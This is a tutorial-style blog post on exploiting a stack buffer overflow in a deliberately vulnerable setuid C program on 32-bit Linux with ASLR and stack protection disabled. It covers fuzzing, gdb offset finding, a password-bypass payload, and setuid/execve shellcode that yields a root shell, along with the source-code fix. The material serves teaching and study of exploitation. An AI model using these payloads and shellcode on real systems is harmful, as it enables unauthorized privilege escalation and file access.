Plain Buffer Overflow

Posted on Thu 08 May 2014 in x86-32 Linux

This is the first in a series of tutorials exploring how to detect and exploit stack-based vulnerabilities on x86-32 Linux systems. As the first, it covers detecting and exploiting a buffer overflow on a system with no protections in place. Modern protections will be explored in future tutorials, but it's important to understand the basics before taking on more complex situations.

A buffer overflow happens when a programmer has not done sufficient bounds checking before or while copying the contents of one buffer into another. A buffer is normally a local array (on the stack) or memory obtained from a dynamic memory allocation function (on the heap). We will concentrate on stack-based buffer overflows at first, as they are much easier for beginners to understand.

All of the code in this tutorial was written by the author.

The Vulnerable App

Below is the source code of the vulnerable application that we will be attacking. It is written in C.

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define PASS "topsecretpassword"

#define SFILE "secret.txt"

int checkpass(char *p);
void printfile();

int main(int argc, char **argv)
{
    int r;

    if (argc < 2) {
        printf("Usage: ");
        printf(argv[0]);
        printf(" <password>\n");
        exit(1);
    }
    r = checkpass(argv[1]);
    if (r != 0) {
        printf("Wrong password: ");
        printf(argv[1]);
        printf("\n");
        exit(1);
    }
    printfile();
}

int checkpass(char *a)
{
    char p[512];
    int r;
    strncpy(p, a, strlen(a)+1);
    r = strcmp(p, PASS);
    return r;
}

void printfile()
{
    FILE *f;
    int c;
    f = fopen(SFILE, "r");
    if (f) {
        while ((c = getc(f)) != EOF)
            putchar(c);
        fclose(f);
    } else {
        printf("Error opening file: " SFILE "\n");
        exit(1);
    }
}

The Fix

The code in the above application that is vulnerable to a stack-based buffer overflow is the strncpy call in checkpass, on line 36 of the listing (strncpy(p, a, strlen(a)+1);). Here the programmer has wrongly calculated the maximum number of bytes that can be copied into the buffer p as strlen(a)+1. This value is based on the length of the input, so it is controlled by the user rather than by the size of p. To fix this vulnerability, change the line to strncpy(p, a, sizeof(p)-1); or strncpy(p, a, 511);. We subtract 1 byte to leave space for the terminating null character '\0'. Note that strncpy does not write that terminator itself when the input is 511 bytes or longer, so the fix should also set it explicitly with p[sizeof(p)-1] = '\0';. For more information about strncpy see man strncpy.
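To see why the two length arguments behave so differently, here is a small Python 3 model of the copy (a sketch, not the C code itself). It relies on one documented property of strncpy: it always writes exactly n bytes to the destination, padding with null bytes if the source is shorter. The names BUF_SIZE, strncpy_model, overflow_bytes and fixed_copy are made up for this illustration.

```python
BUF_SIZE = 512  # sizeof(p) in checkpass()


def strncpy_model(src, n):
    """Return the n bytes that strncpy(dest, src, n) would write.

    strncpy stops reading src at its first null byte and pads the rest
    of the n bytes with nulls; it writes nothing beyond those n bytes.
    """
    src = src.split(b"\x00", 1)[0]
    return src[:n].ljust(n, b"\x00")


def overflow_bytes(src, n):
    """How many bytes land past the end of the 512-byte buffer."""
    return max(0, len(strncpy_model(src, n)) - BUF_SIZE)


def fixed_copy(src):
    """Model of the fix: copy at most 511 bytes, then terminate by hand."""
    buf = bytearray(BUF_SIZE)  # zero-filled here; a C stack buffer is not
    buf[:BUF_SIZE - 1] = strncpy_model(src, BUF_SIZE - 1)
    buf[BUF_SIZE - 1] = 0      # p[sizeof(p) - 1] = '\0' in C
    return bytes(buf)


if __name__ == "__main__":
    arg = b"A" * 600
    print(overflow_bytes(arg, len(arg) + 1))  # vulnerable length argument
    print(overflow_bytes(arg, BUF_SIZE - 1))  # fixed length argument
```

With the vulnerable length the number of bytes written grows with the input, while with the fixed length it never exceeds the buffer no matter what the user supplies.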

Setting Up The Environment

This is how to set up the environment in full on a Debian-based system:

root@dev:~# adduser testuser
Adding user `testuser' ...
Adding new group `testuser' (1001) ...
Adding new user `testuser' (1001) with group `testuser' ...
Creating home directory `/home/testuser' ...
Copying files from `/etc/skel' ...
Enter new UNIX password: 
Retype new UNIX password: 
passwd: password updated successfully
Changing the user information for testuser
Enter the new value, or press ENTER for the default
    Full Name []: 
    Room Number []: 
    Work Phone []: 
    Home Phone []: 
    Other []: 
Is the information correct? [Y/n]
root@dev:~# ls
app.c
root@dev:~# gcc -z execstack -fno-stack-protector -o app app.c
root@dev:~# cp app /home/testuser/
root@dev:~# cat /proc/sys/kernel/randomize_va_space 
2
root@dev:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@dev:~# cat /proc/sys/kernel/randomize_va_space
0
root@dev:~# cd /home/testuser/
root@dev:/home/testuser# ls -l app
-rwxr-xr-x 1 root root 6242 Apr 17 16:48 app
root@dev:/home/testuser# chmod u+s app
root@dev:/home/testuser# ls -l app
-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app
root@dev:/home/testuser# echo 'This is a top secret file!
> Only people with the password should be able to view this file!' > secret.txt
root@dev:/home/testuser# ls -l secret.txt
-rw-r--r-- 1 root root 91 May  9 13:40 secret.txt
root@dev:/home/testuser# chmod 600 secret.txt
root@dev:/home/testuser# ls -l secret.txt
-rw------- 1 root root 91 May  9 13:40 secret.txt
root@dev:/home/testuser# cat secret.txt
This is a top secret file!
Only people with the password should be able to view this file!
root@dev:/home/testuser# su - testuser
testuser@dev:~$ ls -l app
-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app
testuser@dev:~$ ls -l secret.txt 
-rw------- 1 root root 91 May  9 13:40 secret.txt
testuser@dev:~$ cat secret.txt
cat: secret.txt: Permission denied

So our environment is set up and ready for exploit development. First a testuser is added to run the application as. Then, on line 20, the application is compiled with an executable stack (-z execstack) and without stack protector canaries (-fno-stack-protector). On line 24 ASLR is disabled, and on line 30 the setuid bit is set on the application so that it runs with root privileges (which are required to read the file created on lines 33 and 34). Lastly, lines 48 and 49 confirm that the file is not readable by the user that runs the application.
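Before starting on the exploit it can be worth double checking the two settings that matter most: ASLR and the setuid bit. The following Python 3 sketch shows one way to interpret them. The helper names aslr_enabled, is_setuid and describe_mode are hypothetical; the only real interfaces used are the contents of /proc/sys/kernel/randomize_va_space and the standard stat module.

```python
import stat


def aslr_enabled(value_text):
    """Interpret the contents of /proc/sys/kernel/randomize_va_space.

    0 means ASLR is disabled; any other value means it is enabled.
    """
    return int(value_text.strip()) != 0


def is_setuid(mode):
    """True if a file mode (as returned by os.stat().st_mode) has the setuid bit."""
    return bool(mode & stat.S_ISUID)


def describe_mode(mode):
    """Render a mode the way ls -l does, e.g. -rwsr-xr-x."""
    return stat.filemode(mode)


if __name__ == "__main__":
    import os
    with open("/proc/sys/kernel/randomize_va_space") as f:
        print("ASLR enabled:", aslr_enabled(f.read()))
    # "app" is the binary from this tutorial; adjust the path as needed
    if os.path.exists("app"):
        mode = os.stat("app").st_mode
        print(describe_mode(mode), "setuid:", is_setuid(mode))
```

For the setup above we would expect ASLR to be reported as disabled and the mode of app to be shown with an s in the owner's execute position.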

Testing The App / Finding The Vulnerability

First we need to use the application to figure out its inputs and see how the application acts normally:

testuser@dev:~$ ./app
Usage: ./app <password>
testuser@dev:~$ ./app test
Wrong password: test
testuser@dev:~$ echo $?
1

As we can see, when we enter the wrong password the application's exit code is 1. Let's try fuzzing this input to look for a buffer overflow. Here is a simple Python script that can do that:

#!/usr/bin/env python

from subprocess import Popen, PIPE

count = 0 # store the number of A's that caused a crash

for i in range(5000): # loop through the numbers from 0 to 4999

        # execute the file ./app with the argument "A"*i so we keep
        # increasing the number of A's by 1
        process = Popen(["./app", "A"*i], stdout=PIPE)
        (output, err) = process.communicate()

        exit_code = process.wait() # wait for the program's exit code
        if exit_code != 1: # anything other than the normal "wrong
                           # password" exit code of 1 counts as a crash
                count = i # set the count to i
                break # and break out of the loop


print(count) # print the number of A's it took to crash it

Running the python script gives us:

testuser@dev:~$ python app-fuzz.py
524
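The fuzzer treats any exit code other than 1 as a crash, but it does not say what kind of crash it was. On POSIX systems, Popen.wait() returns a negative number -N when the child was killed by signal N, so the exit code can be turned into something more readable. This is a Python 3 sketch; describe_exit is a name invented here.

```python
import signal


def describe_exit(returncode):
    """Turn a subprocess return code into a human-readable description."""
    if returncode < 0:
        # a negative value means the child was terminated by that signal
        return "killed by " + signal.Signals(-returncode).name
    return "exited with status %d" % returncode


if __name__ == "__main__":
    print(describe_exit(1))                    # the normal wrong-password case
    print(describe_exit(-signal.SIGSEGV))      # a segmentation fault
```

Dropping a call like this into the fuzzing loop would make it clear whether the program died from a segmentation fault or from something else.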

Exploiting The App

So the Python script crashed the application by passing 524 A's as its input. Just because we crashed the application doesn't mean we took control of the application's execution, so we now need to figure out how many bytes we need to send before we hijack execution (one character is a single byte, so 524 A's is 524 bytes).

We will use gdb to do this. The hex value for A is 41 (you can find this in the ascii man page, man ascii), so what we are looking for is a crash where the application tries to execute code at address 0x41414141. This is a 32-bit system, so addresses, including the saved return address that we want to overwrite, are 32 bits or 4 bytes long:

testuser@dev:~$ gdb -q ./app
Reading symbols from /home/testuser/app...(no debugging symbols found)...done.
(gdb) r $(python -c 'print "A" * 524')
Starting program: /home/testuser/app $(python -c 'print "A" * 524')

Program received signal SIGSEGV, Segmentation fault.
0xb7ed9d03 in strchrnul () from /lib/i386-linux-gnu/i686/cmov/libc.so.6
(gdb) r $(python -c 'print "A" * 528')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/testuser/app $(python -c 'print "A" * 528')

Program received signal SIGSEGV, Segmentation fault.
0xbffff970 in ?? ()
(gdb) r $(python -c 'print "A" * 532')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/testuser/app $(python -c 'print "A" * 532')

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

We increase the number of bytes by 4 each time because addresses on a 32-bit system are 4 bytes long. So after 528 bytes of padding, the next 4 bytes hijack execution. You can see this because when the application crashes with 532 A's, the address that it is trying to execute is 0x41414141 (on line 21), which is just AAAA.
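The three gdb runs can be understood with a tiny model of the saved return address. This Python 3 sketch assumes only what the runs above show (the return address starts 528 bytes after the start of p) plus the fact that the vulnerable strncpy copies strlen(a)+1 bytes, terminator included. ORIGINAL_RET is the address of the instruction after the call to checkpass, taken from the disassembly of main later in this post; the function name is made up for the illustration.

```python
import struct

RET_OFFSET = 528            # distance from p[0] to the saved return address
ORIGINAL_RET = 0x0804865C   # instruction after "call checkpass" in main


def return_address_after_copy(arg):
    """Model what the vulnerable strncpy leaves in the return-address slot."""
    written = arg + b"\x00"  # strlen(a) + 1 bytes, terminator included
    slot = bytearray(struct.pack("<I", ORIGINAL_RET))  # little endian
    overlap = written[RET_OFFSET:RET_OFFSET + 4]
    slot[:len(overlap)] = overlap  # only the bytes that reach the slot change
    return struct.unpack("<I", bytes(slot))[0]


if __name__ == "__main__":
    for n in (524, 528, 532):
        print(n, hex(return_address_after_copy(b"A" * n)))
```

The model only tracks the return-address slot. It does not try to explain the other crashes, which come from neighbouring stack data being overwritten before the return address is fully under our control.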

I'm going to show you two ways you can exploit this. The first is very easy and just involves changing the flow of the application to bypass the password authentication. First we need to find the address of the code that is run after the check; again we'll use gdb for this:

testuser@dev:~$ gdb -q ./app
Reading symbols from /home/testuser/app...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
   0x0804860c <+0>:     push   ebp
   0x0804860d <+1>:     mov    ebp,esp
   0x0804860f <+3>:     and    esp,0xfffffff0
   0x08048612 <+6>:     sub    esp,0x20
   0x08048615 <+9>:     cmp    DWORD PTR [ebp+0x8],0x1
   0x08048619 <+13>:    jg     0x804864c <main+64>
   0x0804861b <+15>:    mov    DWORD PTR [esp],0x80487f0
   0x08048622 <+22>:    call   0x8048470 <printf@plt>
   0x08048627 <+27>:    mov    eax,DWORD PTR [ebp+0xc]
   0x0804862a <+30>:    mov    eax,DWORD PTR [eax]
   0x0804862c <+32>:    mov    DWORD PTR [esp],eax
   0x0804862f <+35>:    call   0x8048470 <printf@plt>
   0x08048634 <+40>:    mov    DWORD PTR [esp],0x80487f8
   0x0804863b <+47>:    call   0x80484a0 <puts@plt>
   0x08048640 <+52>:    mov    DWORD PTR [esp],0x1
   0x08048647 <+59>:    call   0x80484c0 <exit@plt>
   0x0804864c <+64>:    mov    eax,DWORD PTR [ebp+0xc]
   0x0804864f <+67>:    add    eax,0x4
   0x08048652 <+70>:    mov    eax,DWORD PTR [eax]
   0x08048654 <+72>:    mov    DWORD PTR [esp],eax
   0x08048657 <+75>:    call   0x80486a2 <checkpass>
   0x0804865c <+80>:    mov    DWORD PTR [esp+0x1c],eax
   0x08048660 <+84>:    cmp    DWORD PTR [esp+0x1c],0x0
   0x08048665 <+89>:    je     0x804869b <main+143>
   0x08048667 <+91>:    mov    DWORD PTR [esp],0x8048804
   0x0804866e <+98>:    call   0x8048470 <printf@plt>
   0x08048673 <+103>:   mov    eax,DWORD PTR [ebp+0xc]
   0x08048676 <+106>:   add    eax,0x4
   0x08048679 <+109>:   mov    eax,DWORD PTR [eax]
   0x0804867b <+111>:   mov    DWORD PTR [esp],eax
   0x0804867e <+114>:   call   0x8048470 <printf@plt>
   0x08048683 <+119>:   mov    DWORD PTR [esp],0xa
   0x0804868a <+126>:   call   0x8048500 <putchar@plt>
   0x0804868f <+131>:   mov    DWORD PTR [esp],0x1
   0x08048696 <+138>:   call   0x80484c0 <exit@plt>
   0x0804869b <+143>:   call   0x80486f0 <printfile>
   0x080486a0 <+148>:   leave  
   0x080486a1 <+149>:   ret    
End of assembler dump.

I use the -q option to gdb to suppress the informational message that it normally prints on startup. I then set the disassembly flavor to intel, because gdb defaults to AT&T syntax and I prefer Intel.

The call to printfile on line 41 looks like a good choice to jump to, and as we can see it is at address 0x0804869b. All we need to do is put this address after the 528 bytes of padding, with its bytes in reverse order because x86 is little endian. Here's how:

testuser@dev:~$ ./app $(python -c 'print "A" * 528 + "\x9b\x86\x04\x08"')
This is a top secret file!
Only people with the password should be able to view this file!
Segmentation fault

We still get a segmentation fault but it outputs the contents of the file meaning we've circumvented the password protection.
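Reversing the address bytes by hand is easy to get wrong, so here is a Python 3 sketch that builds the same payload with struct.pack, which handles the little-endian byte order for us. The function name build_payload and its parameters are invented for this example; the offset of 528 and the address 0x0804869b come from the steps above.

```python
import struct


def build_payload(ret_addr, offset=528, filler=b"A"):
    """Return padding followed by ret_addr packed as 4 little-endian bytes."""
    payload = filler * offset + struct.pack("<I", ret_addr)
    if b"\x00" in payload:
        # command-line arguments are C strings, so a null byte would cut
        # the payload short
        raise ValueError("payload contains a null byte")
    return payload


if __name__ == "__main__":
    payload = build_payload(0x0804869B)
    print(len(payload), payload[-4:])
```

Note that the one-liners in this tutorial use Python 2, where print writes raw bytes. Under Python 3, print would encode bytes such as \x9b as UTF-8 and corrupt the address, so the payload is kept as a bytes object here and would need to be passed to the program as bytes (for example as an element of a subprocess argument list).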

Developing Shellcode / Improving Exploitation

Now I'm going to show you how to use this to run your own code as root. First we need some code to run. I've written a quick assembly program for IA-32, in NASM syntax, which just runs the execve system call with /bin/bash as its argument (for more information on execve itself see man execve):

; run /bin/bash

global _start

section .text

_start:
        jmp short Call_shellcode ; jump to where our string is

shellcode:
        pop ebx ; pop the address of our string into ebx
                ; which is the first argument to execve

        xor eax, eax ; zero out the eax register

        mov [ebx +9], al ; put a 0 where the A is to null
                         ; terminate the /bin/bash string

        mov al, 0xb ; put the sys call number 11 into eax

        mov [ebx +10], ebx ; put a pointer to the beginning
                           ; of the string where the BBBB is

        xor ecx, ecx ; zero out the ecx register

        mov [ebx +14], ecx ; replace the CCCC with 0000

        lea ecx, [ebx +10] ; load the address that used to
                           ; point to BBBB into ecx the second
                           ; argument to execve

        lea edx, [ebx +14] ; load the address that used to
                           ; point to CCCC into edx the third
                           ; argument to execve

        int 0x80 ; execute the syscall execve

Call_shellcode:
        call shellcode ; call the start of the actual application
        shell: db       "/bin/bashABBBBCCCC" ; our string of
                                             ; arguments to execve

A system call works by loading the sys call number into the eax register, putting the 1st, 2nd and 3rd arguments into the ebx, ecx and edx registers respectively, and then running int 0x80 to execute the system call. To find the sys call number do this:

testuser@dev:~$ grep execve /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_execve 11

This means execve is 11 or 0xb in hex.
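If you need to look up several sys call numbers, the grep can be replaced by a small parser. This Python 3 sketch assumes the header uses the "#define __NR_name number" form shown in the grep output above; parse_syscall_numbers is a hypothetical helper name.

```python
import re


def parse_syscall_numbers(header_text):
    """Map sys call names to numbers from '#define __NR_<name> <number>' lines."""
    pattern = re.compile(r"^#define\s+__NR_(\w+)\s+(\d+)\s*$", re.MULTILINE)
    return {name: int(number) for name, number in pattern.findall(header_text)}


if __name__ == "__main__":
    # path taken from the grep command above
    with open("/usr/include/i386-linux-gnu/asm/unistd_32.h") as f:
        numbers = parse_syscall_numbers(f.read())
    print("execve =", numbers["execve"], hex(numbers["execve"]))
```

The hex form is what ends up in the mov al instruction of the shellcode.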

In this shellcode I'm using the jmp-call-pop technique to get the address of the string and the list of arguments. When a call instruction is executed, the address of the next instruction is pushed onto the stack; here that is the address of the string, which pop ebx then retrieves. This makes the code position independent. So we now need to extract this shellcode:

testuser@dev:~$ nasm -f elf32 -o shell.o shell.nasm
testuser@dev:~$ ld -o shell shell.o
testuser@dev:~$ objdump -d ./shell|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"

We have shellcode now, but we should test it to make sure it works. The following C application can do that:

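#include <stdio.h>
#include <string.h>

/* the shellcode bytes extracted with objdump above */
unsigned char code[] =
"\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b"
"\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e"
"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43";

int main(void)
{
        /* strlen works here because the shellcode contains no null bytes */
        printf("Shellcode Length:  %zu\n", strlen((char *)code));

        /* treat the array as a function and call it */
        int (*ret)() = (int(*)())code;

        ret();

        return 0;
}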

I've split it up onto multiple lines here for readability. Compiling it and running it:

testuser@dev:~$ gcc -z execstack -o shellcode shellcode.c
testuser@dev:~$ ./shellcode
Shellcode Length:  49
testuser@dev:/home/testuser$

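It worked. The shellcode test application casts the address of the code array to a function pointer and calls it, which runs our shellcode. This wrapper is needed because you can't just run the assembled binary directly: the shellcode writes into its own string, and in the standalone binary that string lives in the read-only .text section: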

testuser@dev:~$ ./shell
Segmentation fault
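Before moving on, the jmp-call-pop layout described earlier can be checked against the extracted bytes. This Python 3 sketch decodes the two relative offsets: the short jmp (opcode 0xEB, 1-byte offset) and the call (opcode 0xE8, 4-byte little-endian offset), both of which are relative to the address of the following instruction. The helper names are invented for the example; the bytes are the ones produced by objdump above.

```python
import struct

SHELLCODE = (
    b"\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b"
    b"\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e"
    b"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    b"\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"
)


def jmp_short_target(code, at):
    """Offset that a 2-byte 'jmp short' located at offset `at` jumps to."""
    if code[at] != 0xEB:
        raise ValueError("not a jmp short")
    rel8 = struct.unpack("b", code[at + 1:at + 2])[0]  # signed 8-bit
    return at + 2 + rel8


def call_target(code, at):
    """Offset that a 5-byte 'call rel32' located at offset `at` calls."""
    if code[at] != 0xE8:
        raise ValueError("not a call rel32")
    rel32 = struct.unpack("<i", code[at + 1:at + 5])[0]  # signed 32-bit
    return at + 5 + rel32


call_at = jmp_short_target(SHELLCODE, 0)   # where the initial jmp lands
pop_at = call_target(SHELLCODE, call_at)   # where the call goes back to
string_at = call_at + 5                    # return address pushed by the call

if __name__ == "__main__":
    print(call_at, pop_at, string_at)
    print(SHELLCODE[string_at:])
    print("null bytes present:", b"\x00" in SHELLCODE)
```

The return address pushed by the call is the offset of the /bin/bash string, which is exactly what pop ebx picks up. The last check matters because the shellcode travels through C strings, where a null byte would end the copy early.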

Now we need a way to put our shellcode in memory and find its address, so that we can hijack execution of our vulnerable application with it. We can put it in an environment variable and use getenv to get its address. Here is how we put it into an environment variable:

testuser@dev:~$ export SHELLCODE=$(python -c 'print "\x90" * 500 + "\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"')
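The 500 \x90 bytes in front of the shellcode are x86 NOP instructions, often called a NOP sled: execution that lands anywhere inside them simply slides forward into the shellcode, so the address we jump to does not have to be exact. Here is a Python 3 sketch of that idea. The names make_env_value and lands_in_sled are made up, and the address used in the example is only an illustration.

```python
NOP = b"\x90"  # one-byte x86 "no operation" instruction


def make_env_value(shellcode, sled_len=500):
    """Prefix the shellcode with a NOP sled, as in the export command above."""
    value = NOP * sled_len + shellcode
    if b"\x00" in value:
        # environment variables are C strings and cannot hold null bytes
        raise ValueError("value contains a null byte")
    return value


def lands_in_sled(guess, var_addr, sled_len=500):
    """True if jumping to `guess` hits the sled or the first shellcode byte."""
    return var_addr <= guess <= var_addr + sled_len


if __name__ == "__main__":
    value = make_env_value(b"\xcc" * 49)   # placeholder bytes, not real shellcode
    print(len(value))
    print(lands_in_sled(0xBFFFF774 + 200, 0xBFFFF774))
```

In other words, the sled gives us roughly 500 bytes of tolerance if the address we work out is a little too high.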

Here is another C application that we can use to get the address of an environment variable in the memory of another application:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
        char *ptr;

        if(argc < 3) {
                printf("Usage: %s <environment variable> <target program name>\n", argv[0]);
                exit(0);
        }
        ptr = getenv(argv[1]); /* get env var location */
        if(ptr == NULL) { /* getenv returns NULL if the variable is not set */
                printf("%s is not set\n", argv[1]);
                exit(1);
        }
        /* adjust for program name; signed so a longer target name works too */
        ptr += ((int)strlen(argv[0]) - (int)strlen(argv[2]))*2;
        printf("%s will be at %p\n", argv[1], ptr);
        return 0;
}

We compile this application and run it with the relevant arguments:

testuser@dev:~$ gcc -o getenvaddr getenvaddr.c
testuser@dev:~$ ./getenvaddr SHELLCODE ./app
SHELLCODE will be at 0xbffff774
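The adjustment that getenvaddr makes is plain arithmetic: the address it sees in its own process is shifted by twice the difference between the two program name lengths. This Python 3 sketch reproduces that calculation. The function name is invented, and the unadjusted address 0xbffff766 is not printed anywhere above; it is worked backwards from the reported result.

```python
def adjust_env_address(addr_in_helper, helper_name, target_name):
    """Apply the same correction as getenvaddr.c: 2 bytes per character of difference."""
    return addr_in_helper + (len(helper_name) - len(target_name)) * 2


if __name__ == "__main__":
    # "./getenvaddr" is 12 characters, "./app" is 5, so the shift is 14 bytes
    shift = (len("./getenvaddr") - len("./app")) * 2
    print(shift)
    print(hex(adjust_env_address(0xBFFFF766, "./getenvaddr", "./app")))
```

A shorter program name leaves more room at the top of the stack, so the variable ends up at a higher address in ./app than it does in ./getenvaddr.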

Great! Nearly there. We've got the address of our shellcode; now to use it. We will hijack the execution flow as we did before, but this time we will point it to the address of our environment variable:

testuser@dev:~$ ./app $(python -c 'print "A" * 528 + "\x74\xf7\xff\xbf"')
bash-4.2$ whoami
testuser
bash-4.2$ cat secret.txt
cat: secret.txt: Permission denied

Damn! So it didn't work. We got a shell, but it is running as testuser: bash drops privileges when it is started with an effective UID that differs from the real UID. No need to worry, but we now need to change our shellcode to run the setuid system call before executing execve, setting the UID to 0 (root) (for more information on setuid see man setuid). First we need to find out the sys call number:

testuser@dev:~$ grep setuid /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_setuid 23
#define __NR_setuid32 213

The sys call number is 23, or 0x17 in hex. Our modified shellcode is:

; run /bin/bash

global _start

section .text

_start:
        jmp short Call_shellcode ; jump to where our string is

shellcode:
        xor eax, eax ; zero out eax

        mov al, 0x17 ; put 23 into eax to setuid

        xor ebx, ebx ; zero out ebx

        int 0x80 ; make the syscall setuid

        mov eax, ebx ; zero out eax by copying the 0 in ebx

        pop ebx ; pop the address of our string into ebx
                ; which is the first argument to execve

        mov [ebx +9], al ; put a 0 where the A is to null
                         ; terminate the /bin/bash string

        mov al, 0xb ; put the sys call number 11 into eax

        mov [ebx +10], ebx ; put a pointer to the beginning
                           ; of the string where the BBBB is

        xor ecx, ecx ; zero out the ecx register

        mov [ebx +14], ecx ; replace the CCCC with 0000

        lea ecx, [ebx +10] ; load the address that used to
                           ; point to BBBB into ecx the second
                           ; argument to execve

        lea edx, [ebx +14] ; load the address that used to
                           ; point to CCCC into edx the third
                           ; argument to execve

        int 0x80 ; execute the syscall execve

Call_shellcode:
        call shellcode ; call the start of the actual application
        shell: db       "/bin/bashABBBBCCCC" ; our string of
                                             ; arguments to execve

This is the same as before except I added a call to setuid before it starts setting up the call to execve. Let's first make sure it works:

testuser@dev:~$ nasm -f elf32 -o shell2.o shell2.nasm
testuser@dev:~$ ld -o shell2 shell2.o
testuser@dev:~$ objdump -d ./shell2|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-6 -d' '|tr -s ' '|tr '\t' ' '|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g'
"\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"
testuser@dev:~$ cat shellcode.c
#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43";

main()
{

        printf("Shellcode Length:  %d\n", strlen(code));

        int (*ret)() = (int(*)())code;

        ret();

}
testuser@dev:~$ gcc -z execstack -o shellcode shellcode.c
testuser@dev:~$ ./shellcode
Shellcode Length:  57
testuser@dev:/home/testuser$

That seems to work, let's test it out:

testuser@dev:~$ export SHELLCODE=$(python -c 'print "\x90" * 500 + "\xeb\x20\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x89\xd8\x5b\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xdb\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43"')
testuser@dev:~$ ./getenvaddr SHELLCODE ./app
SHELLCODE will be at 0xbffff76c
testuser@dev:~$ ./app $(python -c 'print "A" * 528 + "\x6c\xf7\xff\xbf"')
root@dev:/home/testuser# whoami
root
root@dev:/home/testuser# cat secret.txt
This is a top secret file!
Only people with the password should be able to view this file!

PWNED!!! :-D
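The difference between the failed attempt and the successful one comes down to real versus effective user IDs. A setuid-root binary started by testuser runs with a real UID of 1001 and an effective UID of 0. Bash, unless started with -p, resets its effective UID to the real UID when the two differ, while setuid(0) called with an effective UID of 0 sets both to 0. The following Python 3 sketch models just those two rules; the function names are hypothetical and the UID 1001 is the one adduser reported above.

```python
def setuid_zero(real_uid, effective_uid):
    """Model setuid(0): allowed when the effective UID is 0, sets both IDs to 0."""
    if effective_uid != 0:
        raise PermissionError("setuid(0) needs an effective UID of 0")
    return (0, 0)


def uid_after_bash_start(real_uid, effective_uid, p_flag=False):
    """Effective UID that bash keeps after start-up."""
    if effective_uid != real_uid and not p_flag:
        return real_uid  # privileges dropped
    return effective_uid


if __name__ == "__main__":
    # first shellcode: execve straight away
    print(uid_after_bash_start(1001, 0))
    # second shellcode: setuid(0) first, then execve
    print(uid_after_bash_start(*setuid_zero(1001, 0)))
```

This is only a model of the behaviour seen in the two runs, but it shows why adding a single setuid(0) call before execve was enough.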

Conclusion

It's very important to understand that when you are developing exploits you are always going to run into problems. That is why I left in the part where I didn't get root access. You will fail over and over again, but if you keep trying you will find a way to hack it in the end.

This was one of the simplest examples possible, but it is important that you are able to do this before continuing. Don't worry if you don't understand how the application's execution was hijacked or how the stack works. I will explain all of that in later tutorials when it becomes necessary; this tutorial is already long enough without going into more depth.

I hope you enjoyed reading this as much as I enjoyed writing it.

Happy Hacking :-)